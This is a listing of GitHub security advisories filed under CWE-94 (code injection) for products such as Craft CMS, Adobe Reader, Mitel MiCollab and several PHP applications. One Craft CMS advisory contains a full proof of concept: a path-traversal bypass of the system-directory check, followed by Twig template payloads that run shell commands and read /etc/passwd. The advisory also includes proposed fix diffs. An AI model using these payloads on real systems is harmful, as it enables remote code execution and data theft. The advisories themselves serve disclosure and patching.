CWE-94
Allowed-with-ReviewImproper Control of Generation of Code ('Code Injection')
Abstraction: Base · Status: Draft
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
8285 vulnerabilities reference this CWE, most recent first.
GHSA-F39F-HVGR-FWWX
Vulnerability from github – Published: 2022-05-17 00:55 – Updated: 2022-05-17 00:55Unspecified vulnerability in Adobe Reader 11.0.02 allows remote attackers to execute arbitrary code via vectors related to a "break into the sandbox," as demonstrated by George Hotz during a Pwn2Own competition at CanSecWest 2013.
{
"affected": [],
"aliases": [
"CVE-2013-2549"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2013-03-11T10:55:00Z",
"severity": "HIGH"
},
"details": "Unspecified vulnerability in Adobe Reader 11.0.02 allows remote attackers to execute arbitrary code via vectors related to a \"break into the sandbox,\" as demonstrated by George Hotz during a Pwn2Own competition at CanSecWest 2013.",
"id": "GHSA-f39f-hvgr-fwwx",
"modified": "2022-05-17T00:55:15Z",
"published": "2022-05-17T00:55:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2013-2549"
},
{
"type": "WEB",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A16809"
},
{
"type": "WEB",
"url": "http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Pwn2Own-2013/ba-p/5981157"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2013-05/msg00004.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2013-0826.html"
},
{
"type": "WEB",
"url": "http://security.gentoo.org/glsa/glsa-201308-03.xml"
},
{
"type": "WEB",
"url": "http://twitter.com/thezdi/statuses/309771882612281344"
},
{
"type": "WEB",
"url": "http://www.adobe.com/support/security/bulletins/apsb13-15.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-F3CW-HG6R-CHFV
Vulnerability from github – Published: 2024-11-13 14:16 – Updated: 2025-07-16 21:01Summary
Missing normalizePath in the function FileHelper::absolutePath could lead to Remote Code Execution on the server via twig SSTI.
(Post-authentication, ALLOW_ADMIN_CHANGES=true)
Details
Note: This is a sequel to CVE-2023-40035
In src/helpers/FileHelper.php#L106-L137, the function absolutePath returned $from . $ds . $to without path normalization:
/**
* Returns an absolute path based on a source location or the current working directory.
*
* @param string $to The target path.
* @param string|null $from The source location. Defaults to the current working directory.
* @param string $ds the directory separator to be used in the normalized result. Defaults to `DIRECTORY_SEPARATOR`.
* @return string
* @since 4.3.5
*/
public static function absolutePath(
string $to,
?string $from = null,
string $ds = DIRECTORY_SEPARATOR,
): string {
$to = static::normalizePath($to, $ds);
// Already absolute?
if (
str_starts_with($to, $ds) ||
preg_match(sprintf('/^[A-Z]:%s/', preg_quote($ds, '/')), $to)
) {
return $to;
}
if ($from === null) {
$from = FileHelper::normalizePath(getcwd(), $ds);
} else {
$from = static::absolutePath($from, ds: $ds);
}
return $from . $ds . $to;
}
This could leads to multiple security risks, one of them is in src/services/Security.php#L201-L220 where ../templates/poc is not considered a system dir.
Let's see what happens after calling isSystemDir("../templates/poc"):
/**
* Returns whether the given file path is located within or above any system directories.
*
* @param string $path
* @return bool
* @since 5.4.2
*/
public function isSystemDir(string $path): bool // $path = "../templates/poc"
{
$path = FileHelper::absolutePath($path, '/'); // $path = "/var/www/html/web//../templates/poc"
foreach (Craft::$app->getPath()->getSystemPaths() as $dir) {
$dir = FileHelper::absolutePath($dir, '/'); // $dir = "/var/www/html/templates"
if (str_starts_with("$path/", "$dir/") || str_starts_with("$dir/", "$path/")) { // if (false || false)
return true;
}
}
return false; // We're here!
}
Now that the path ../templates/poc can bypass isSystemDir, it will also bypass the function validatePath in src/fs/Local.php#L124-L136:
/**
* @param string $attribute
* @param array|null $params
* @param InlineValidator $validator
* @return void
* @since 4.4.6
*/
public function validatePath(string $attribute, ?array $params, InlineValidator $validator): void
{
if (Craft::$app->getSecurity()->isSystemDir($this->getRootPath())) {
$validator->addError($this, $attribute, Craft::t('app', 'Local filesystems cannot be located within or above system directories.'));
}
}
We can now create a Local filesystem within the system directories, particularly in /var/www/html/templates/poc
Then create a new asset volume with that filesystem, upload a poc.ttml file with twig code and execute using a new route with template path poc/poc.ttml
Although craftcms does sandbox twig ssti, the list in src/web/twig/Extension.php#L180-L268 is still incomplete.
{{['id'] has some 'system'}}
{{['ls'] has every 'passthru'}}
{{['cat /etc/passwd']|find('system')}}
{{['id;pwd;ls -altr /']|find('passthru')}}
These payloads still work, see twigphp/Twig/src/Extension/CoreExtension.php#getFilters() and twigphp/Twig/src/Extension/CoreExtension.php#getOperators() for more informations.
PoC
- Craft CMS was installed using https://craftcms.com/docs/4.x/installation.html#quick-start
mkdir craftcms && cd craftcms
ddev config --project-type=craftcms --docroot=web --create-docroot
ddev composer create -y --no-scripts "craftcms/craft"
ddev craft install
php craft setup/security-key
ddev start
- Create a new filesystem with base path
../templates/poc
Notice that the poc directory was created
- Create a new asset volume using the
pocfilesystem
Upload a poc.ttml file with RCE template code
{{'<pre>'}}
{{ 8*8 }}
{{['id'] has some 'system'}}
{{['ls'] has every 'passthru'}}
{{['cat /etc/passwd']|find('system')}}
{{['id;pwd;ls -altr /']|find('passthru')}}
Note: find was added to twig last month. If you're running this poc on an older version of twig try removing the last 2 lines.
- Create a new route
*with templatepoc/poc.ttml
- This leads to Remote Code Execution on arbitrary route
/*
Remediation
diff --git a/src/helpers/FileHelper.php b/src/helpers/FileHelper.php
index 0c2da884a7..ac23ce556a 100644
--- a/src/helpers/FileHelper.php
+++ b/src/helpers/FileHelper.php
@@ -133,7 +133,7 @@ class FileHelper extends \yii\helpers\FileHelper
$from = static::absolutePath($from, ds: $ds);
}
- return $from . $ds . $to;
+ return FileHelper::normalizePath($from . $ds . $to);
}
/**
See twigphp/Twig/src/Extension/CoreExtension.php for updated filters and operators, a possible fix could look like:
diff --git a/src/web/twig/Extension.php b/src/web/twig/Extension.php
index efff2d2412..756f452f8b 100644
--- a/src/web/twig/Extension.php
+++ b/src/web/twig/Extension.php
@@ -225,6 +225,9 @@ class Extension extends AbstractExtension implements GlobalsInterface
new TwigFilter('lcfirst', [$this, 'lcfirstFilter']),
new TwigFilter('literal', [$this, 'literalFilter']),
new TwigFilter('map', [$this, 'mapFilter'], ['needs_environment' => true]),
+ new TwigFilter('find', [$this, 'find'], ['needs_environment' => true]),
+ new TwigFilter('has some' => ['precedence' => 20, 'class' => HasSomeBinary::class, 'associativity' => ExpressionParser::OPERATOR_LEFT]),
+ new TwigFilter('has every' => ['precedence' => 20, 'class' => HasEveryBinary::class, 'associativity' => ExpressionParser::OPERATOR_LEFT]),
new TwigFilter('markdown', [$this, 'markdownFilter'], ['is_safe' => ['html']]),
new TwigFilter('md', [$this, 'markdownFilter'], ['is_safe' => ['html']]),
new TwigFilter('merge', [$this, 'mergeFilter']),
Impact
Take control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.
Although the vulnerability is exploitable only in the authenticated users, configuration with ALLOW_ADMIN_CHANGES=true, there is still a potential security threat (Remote Code Execution)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.12.1"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0-RC1"
},
{
"fixed": "4.12.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.4.2"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0-RC1"
},
{
"fixed": "5.4.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-52293"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2024-11-13T14:16:38Z",
"nvd_published_at": "2024-11-13T16:15:19Z",
"severity": "HIGH"
},
"details": "### Summary\n\nMissing `normalizePath` in the function `FileHelper::absolutePath` could lead to Remote Code Execution on the server via twig SSTI.\n\n`(Post-authentication, ALLOW_ADMIN_CHANGES=true)`\n\n### Details\n\nNote: This is a sequel to [CVE-2023-40035](https://github.com/craftcms/cms/security/advisories/GHSA-44wr-rmwq-3phw)\n\nIn [`src/helpers/FileHelper.php#L106-L137`](https://github.com/craftcms/cms/blob/5e56c6d168524ed02f0620c9bc1c9750f5b94e3b/src/helpers/FileHelper.php#L106-L137), the function `absolutePath` returned `$from . $ds . $to` without path normalization:\n\n```php\n/**\n * Returns an absolute path based on a source location or the current working directory.\n *\n * @param string $to The target path.\n * @param string|null $from The source location. Defaults to the current working directory.\n * @param string $ds the directory separator to be used in the normalized result. Defaults to `DIRECTORY_SEPARATOR`.\n * @return string\n * @since 4.3.5\n */\npublic static function absolutePath(\n string $to,\n ?string $from = null,\n string $ds = DIRECTORY_SEPARATOR,\n): string {\n $to = static::normalizePath($to, $ds);\n\n // Already absolute?\n if (\n str_starts_with($to, $ds) ||\n preg_match(sprintf(\u0027/^[A-Z]:%s/\u0027, preg_quote($ds, \u0027/\u0027)), $to)\n ) {\n return $to;\n }\n\n if ($from === null) {\n $from = FileHelper::normalizePath(getcwd(), $ds);\n } else {\n $from = static::absolutePath($from, ds: $ds);\n }\n\n return $from . $ds . $to;\n}\n```\n\nThis could leads to multiple security risks, one of them is in [`src/services/Security.php#L201-L220`](https://github.com/craftcms/cms/blob/5e56c6d168524ed02f0620c9bc1c9750f5b94e3b/src/services/Security.php#L201-L220) where `../templates/poc` is not considered a system dir.\n\nLet\u0027s see what happens after calling `isSystemDir(\"../templates/poc\")`:\n\n```php\n/**\n * Returns whether the given file path is located within or above any system directories.\n *\n * @param string $path\n * @return bool\n * @since 5.4.2\n */\npublic function isSystemDir(string $path): bool // $path = \"../templates/poc\"\n{\n $path = FileHelper::absolutePath($path, \u0027/\u0027); // $path = \"/var/www/html/web//../templates/poc\"\n\n foreach (Craft::$app-\u003egetPath()-\u003egetSystemPaths() as $dir) {\n $dir = FileHelper::absolutePath($dir, \u0027/\u0027); // $dir = \"/var/www/html/templates\"\n if (str_starts_with(\"$path/\", \"$dir/\") || str_starts_with(\"$dir/\", \"$path/\")) { // if (false || false)\n return true;\n }\n }\n\n return false; // We\u0027re here!\n}\n```\n\nNow that the path `../templates/poc` can bypass `isSystemDir`, it will also bypass the function `validatePath` in [`src/fs/Local.php#L124-L136`](https://github.com/craftcms/cms/blob/5e56c6d168524ed02f0620c9bc1c9750f5b94e3b/src/fs/Local.php#L124-L136):\n```php\n/**\n * @param string $attribute\n * @param array|null $params\n * @param InlineValidator $validator\n * @return void\n * @since 4.4.6\n */\npublic function validatePath(string $attribute, ?array $params, InlineValidator $validator): void\n{\n if (Craft::$app-\u003egetSecurity()-\u003eisSystemDir($this-\u003egetRootPath())) {\n $validator-\u003eaddError($this, $attribute, Craft::t(\u0027app\u0027, \u0027Local filesystems cannot be located within or above system directories.\u0027));\n }\n}\n```\n\nWe can now create a Local filesystem within the system directories, particularly in `/var/www/html/templates/poc`\n\nThen create a new asset volume with that filesystem, upload a `poc.ttml` file with twig code and execute using a new route with template path `poc/poc.ttml`\n\nAlthough craftcms does sandbox twig ssti, the list in [src/web/twig/Extension.php#L180-L268](https://github.com/craftcms/cms/blob/5e56c6d168524ed02f0620c9bc1c9750f5b94e3b/src/web/twig/Extension.php#L180-L268) is still incomplete.\n\n\n```js\n{{[\u0027id\u0027] has some \u0027system\u0027}}\n{{[\u0027ls\u0027] has every \u0027passthru\u0027}}\n{{[\u0027cat /etc/passwd\u0027]|find(\u0027system\u0027)}}\n{{[\u0027id;pwd;ls -altr /\u0027]|find(\u0027passthru\u0027)}}\n```\n\nThese payloads still work, see [twigphp/Twig/src/Extension/CoreExtension.php#getFilters()](https://github.com/twigphp/Twig/blob/a3496d148b75e270065ed8f03758f7b09b3a9793/src/Extension/CoreExtension.php#L196-L247) and [twigphp/Twig/src/Extension/CoreExtension.php#getOperators()](https://github.com/twigphp/Twig/blob/a3496d148b75e270065ed8f03758f7b09b3a9793/src/Extension/CoreExtension.php#L291-L333) for more informations.\n\n### PoC\n\n1. Craft CMS was installed using https://craftcms.com/docs/4.x/installation.html#quick-start\n\n```sh\nmkdir craftcms \u0026\u0026 cd craftcms\nddev config --project-type=craftcms --docroot=web --create-docroot\nddev composer create -y --no-scripts \"craftcms/craft\"\nddev craft install\nphp craft setup/security-key\nddev start\n```\n\n\u003cimg width=\"1280\" alt=\"start\" src=\"https://github.com/user-attachments/assets/f8bcc22a-6ffd-40a5-81c6-c077fa4ce1d3\"\u003e\n\n2. Create a new filesystem with base path `../templates/poc`\n\n\u003cimg width=\"1280\" alt=\"filesystem\" src=\"https://github.com/user-attachments/assets/fe78e023-bd51-4fc1-a22e-dcfa5baf266b\"\u003e\n\nNotice that the `poc` directory was created\n\n\u003cimg width=\"167\" alt=\"dir\" src=\"https://github.com/user-attachments/assets/ccc45ce8-8555-4aae-ae48-320a630e7d79\"\u003e\n\n3. Create a new asset volume using the `poc` filesystem\n\n\u003cimg width=\"1280\" alt=\"asset\" src=\"https://github.com/user-attachments/assets/b5530766-11b4-4e45-ae58-82f81fc2db00\"\u003e\n\nUpload a `poc.ttml` file with RCE template code\n\n```js\n{{\u0027\u003cpre\u003e\u0027}}\n{{ 8*8 }}\n{{[\u0027id\u0027] has some \u0027system\u0027}}\n{{[\u0027ls\u0027] has every \u0027passthru\u0027}}\n{{[\u0027cat /etc/passwd\u0027]|find(\u0027system\u0027)}}\n{{[\u0027id;pwd;ls -altr /\u0027]|find(\u0027passthru\u0027)}}\n```\n\nNote: `find` was added to twig [last month](https://github.com/twigphp/Twig/commit/4e262511930e408e4c7eda07b1c977f2ea98575c). If you\u0027re running this poc on an older version of twig try removing the last 2 lines.\n\n\u003cimg width=\"1280\" alt=\"upload\" src=\"https://github.com/user-attachments/assets/63e65beb-2ede-4141-85d2-e7d21cd4b8ad\"\u003e\n\n\n\n4. Create a new route `*` with template `poc/poc.ttml`\n\n\u003cimg width=\"1280\" alt=\"route\" src=\"https://github.com/user-attachments/assets/b92d9340-b6a5-40d8-a8e8-ddab5cfc9f21\"\u003e\n\n5. This leads to Remote Code Execution on arbitrary route `/*`\n\n\u003cimg width=\"454\" alt=\"rce\" src=\"https://github.com/user-attachments/assets/19765f6c-1c28-4a0b-a89c-25f6f05ceca6\"\u003e\n\n### Remediation\n\n```diff\ndiff --git a/src/helpers/FileHelper.php b/src/helpers/FileHelper.php\nindex 0c2da884a7..ac23ce556a 100644\n--- a/src/helpers/FileHelper.php\n+++ b/src/helpers/FileHelper.php\n@@ -133,7 +133,7 @@ class FileHelper extends \\yii\\helpers\\FileHelper\n $from = static::absolutePath($from, ds: $ds);\n }\n\n- return $from . $ds . $to;\n+ return FileHelper::normalizePath($from . $ds . $to);\n }\n\n /**\n```\n\n\n\nSee [twigphp/Twig/src/Extension/CoreExtension.php](https://github.com/twigphp/Twig/blob/a3496d148b75e270065ed8f03758f7b09b3a9793/src/Extension/CoreExtension.php) for updated filters and operators, a possible fix could look like:\n\n```diff\ndiff --git a/src/web/twig/Extension.php b/src/web/twig/Extension.php\nindex efff2d2412..756f452f8b 100644\n--- a/src/web/twig/Extension.php\n+++ b/src/web/twig/Extension.php\n@@ -225,6 +225,9 @@ class Extension extends AbstractExtension implements GlobalsInterface\n new TwigFilter(\u0027lcfirst\u0027, [$this, \u0027lcfirstFilter\u0027]),\n new TwigFilter(\u0027literal\u0027, [$this, \u0027literalFilter\u0027]),\n new TwigFilter(\u0027map\u0027, [$this, \u0027mapFilter\u0027], [\u0027needs_environment\u0027 =\u003e true]),\n+ new TwigFilter(\u0027find\u0027, [$this, \u0027find\u0027], [\u0027needs_environment\u0027 =\u003e true]),\n+ new TwigFilter(\u0027has some\u0027 =\u003e [\u0027precedence\u0027 =\u003e 20, \u0027class\u0027 =\u003e HasSomeBinary::class, \u0027associativity\u0027 =\u003e ExpressionParser::OPERATOR_LEFT]),\n+ new TwigFilter(\u0027has every\u0027 =\u003e [\u0027precedence\u0027 =\u003e 20, \u0027class\u0027 =\u003e HasEveryBinary::class, \u0027associativity\u0027 =\u003e ExpressionParser::OPERATOR_LEFT]),\n new TwigFilter(\u0027markdown\u0027, [$this, \u0027markdownFilter\u0027], [\u0027is_safe\u0027 =\u003e [\u0027html\u0027]]),\n new TwigFilter(\u0027md\u0027, [$this, \u0027markdownFilter\u0027], [\u0027is_safe\u0027 =\u003e [\u0027html\u0027]]),\n new TwigFilter(\u0027merge\u0027, [$this, \u0027mergeFilter\u0027]),\n```\n\n\n\n### Impact\n\nTake control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.\n\nAlthough the vulnerability is exploitable only in the authenticated users, configuration with `ALLOW_ADMIN_CHANGES=true`, there is still a potential security threat (Remote Code Execution)",
"id": "GHSA-f3cw-hg6r-chfv",
"modified": "2025-07-16T21:01:41Z",
"published": "2024-11-13T14:16:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52293"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/commit/123e48a696de1e2f63ab519d4730eb3b87beaa58"
},
{
"type": "PACKAGE",
"url": "https://github.com/craftcms/cms"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Craft CMS vulnerable to Potential Remote Code Execution via missing path normalization \u0026 Twig SSTI"
}
GHSA-F3F7-W28X-9VG3
Vulnerability from github – Published: 2022-05-02 03:45 – Updated: 2022-05-02 03:45Multiple PHP remote file inclusion vulnerabilities in Loggix Project 9.4.5 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the pathToIndex parameter to (1) Calendar.php, (2) Comment.php, (3) Rss.php and (4) Trackback.php in lib/Loggix/Module/; and (5) modules/downloads/lib/LM_Downloads.php.
{
"affected": [],
"aliases": [
"CVE-2009-3492"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2009-09-30T15:30:00Z",
"severity": "HIGH"
},
"details": "Multiple PHP remote file inclusion vulnerabilities in Loggix Project 9.4.5 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the pathToIndex parameter to (1) Calendar.php, (2) Comment.php, (3) Rss.php and (4) Trackback.php in lib/Loggix/Module/; and (5) modules/downloads/lib/LM_Downloads.php.",
"id": "GHSA-f3f7-w28x-9vg3",
"modified": "2022-05-02T03:45:33Z",
"published": "2022-05-02T03:45:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3492"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53402"
},
{
"type": "WEB",
"url": "http://www.exploit-db.com/exploits/9729"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-F3FM-623C-WFMM
Vulnerability from github – Published: 2024-10-21 21:30 – Updated: 2024-11-08 18:30A vulnerability in the Desktop Client of Mitel MiCollab through 9.7.1.110, and MiVoice Business Solution Virtual Instance (MiVB SVI) 1.0.0.25, could allow an unauthenticated attacker to conduct a command injection attack due to insufficient parameter sanitization. A successful exploit could allow an attacker to execute arbitrary scripts.
{
"affected": [],
"aliases": [
"CVE-2024-35314"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-21T21:15:05Z",
"severity": "CRITICAL"
},
"details": "A vulnerability in the Desktop Client of Mitel MiCollab through 9.7.1.110, and MiVoice Business Solution Virtual Instance (MiVB SVI) 1.0.0.25, could allow an unauthenticated attacker to conduct a command injection attack due to insufficient parameter sanitization. A successful exploit could allow an attacker to execute arbitrary scripts.",
"id": "GHSA-f3fm-623c-wfmm",
"modified": "2024-11-08T18:30:47Z",
"published": "2024-10-21T21:30:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35314"
},
{
"type": "WEB",
"url": "https://www.mitel.com/-/media/mitel/file/pdf/support/security-advisories/security-bulletin_24-0015-001-v3.pdf"
},
{
"type": "WEB",
"url": "https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-24-0015"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-F3GW-9WW9-JMC3
Vulnerability from github – Published: 2025-04-25 15:02 – Updated: 2026-03-20 21:28Impact
This is an additional fix for https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g
This is a high-impact, low-complexity attack vector. To mitigate the issue, users running Craft installations before the fixed versions are encouraged to update to at least that version.
Details
https://craftcms.com/knowledge-base/craft-cms-cve-2025-32432
References
https://github.com/craftcms/cms/commit/e1c85441fa47eeb7c688c2053f25419bc0547b47
https://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-critical https://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5617---2025-04-10-critical
https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms/
Credits
Credit to Orange Cyberdefense for discovering a reporting this bug.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.9.14"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0-RC1"
},
{
"fixed": "3.9.15"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.14.14"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0-RC1"
},
{
"fixed": "4.14.15"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.6.16"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0-RC1"
},
{
"fixed": "5.6.17"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-32432"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-25T15:02:53Z",
"nvd_published_at": "2025-04-25T15:15:36Z",
"severity": "CRITICAL"
},
"details": "### Impact\n\nThis is an additional fix for https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g\n\nThis is a high-impact, low-complexity attack vector. To mitigate the issue, users running Craft installations before the fixed versions are encouraged to update to at least that version. \n\n### Details\n\nhttps://craftcms.com/knowledge-base/craft-cms-cve-2025-32432\n\n### References\n\nhttps://github.com/craftcms/cms/commit/e1c85441fa47eeb7c688c2053f25419bc0547b47\n\nhttps://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-critical\nhttps://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical\nhttps://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5617---2025-04-10-critical\n\nhttps://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms/\n\n### Credits\n\nCredit to [Orange Cyberdefense](https://github.com/Orange-Cyberdefense) for discovering a reporting this bug.",
"id": "GHSA-f3gw-9ww9-jmc3",
"modified": "2026-03-20T21:28:37Z",
"published": "2025-04-25T15:02:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-f3gw-9ww9-jmc3"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32432"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/commit/e1c85441fa47eeb7c688c2053f25419bc0547b47"
},
{
"type": "WEB",
"url": "https://craftcms.com/knowledge-base/craft-cms-cve-2025-32432"
},
{
"type": "PACKAGE",
"url": "https://github.com/craftcms/cms"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-critical"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5617---2025-04-10-critical"
},
{
"type": "WEB",
"url": "https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-32432"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "Craft CMS Allows Remote Code Execution"
}
GHSA-F3H6-89Q4-C7XX
Vulnerability from github – Published: 2022-05-01 07:24 – Updated: 2022-05-01 07:24PHP remote file inclusion vulnerability in index.php in Tagmin Control Center in TagIt! Tagboard 2.1.B Build 2 allows remote attackers to execute arbitrary PHP code via a URL in the page parameter.
{
"affected": [],
"aliases": [
"CVE-2006-5093"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2006-09-29T21:07:00Z",
"severity": "HIGH"
},
"details": "PHP remote file inclusion vulnerability in index.php in Tagmin Control Center in TagIt! Tagboard 2.1.B Build 2 allows remote attackers to execute arbitrary PHP code via a URL in the page parameter.",
"id": "GHSA-f3h6-89q4-c7xx",
"modified": "2022-05-01T07:24:58Z",
"published": "2022-05-01T07:24:58Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2006-5093"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29257"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/2450"
},
{
"type": "WEB",
"url": "http://kernel-32.blogspot.com/2006/09/tagmin-cc-21b-remote-file-include.html"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/22189"
},
{
"type": "WEB",
"url": "http://www.osvdb.org/29293"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/20260"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2006/3850"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-F3JW-73HJ-7RPH
Vulnerability from github – Published: 2022-05-02 00:03 – Updated: 2022-05-02 00:03PHP remote file inclusion vulnerability in admin/create_order_new.php in Freeway 1.4.1.171, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the include_page parameter.
{
"affected": [],
"aliases": [
"CVE-2008-3769"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2008-08-22T16:41:00Z",
"severity": "MODERATE"
},
"details": "PHP remote file inclusion vulnerability in admin/create_order_new.php in Freeway 1.4.1.171, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the include_page parameter.",
"id": "GHSA-f3jw-73hj-7rph",
"modified": "2022-05-02T00:03:23Z",
"published": "2022-05-02T00:03:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2008-3769"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/45036"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/31475"
},
{
"type": "WEB",
"url": "http://securityreason.com/securityalert/4181"
},
{
"type": "WEB",
"url": "http://www.openfreeway.org/download/change-log.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/archive/1/495549/100/0/threaded"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-F3MJ-X3HH-929R
Vulnerability from github – Published: 2022-04-29 00:00 – Updated: 2022-05-06 00:00In JetBrains IntelliJ IDEA before 2022.1 local code execution via links in Quick Documentation was possible
{
"affected": [],
"aliases": [
"CVE-2022-29819"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-04-28T10:15:00Z",
"severity": "HIGH"
},
"details": "In JetBrains IntelliJ IDEA before 2022.1 local code execution via links in Quick Documentation was possible",
"id": "GHSA-f3mj-x3hh-929r",
"modified": "2022-05-06T00:00:59Z",
"published": "2022-04-29T00:00:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29819"
},
{
"type": "WEB",
"url": "https://www.jetbrains.com/privacy-security/issues-fixed"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-F3PC-JH8H-4MVW
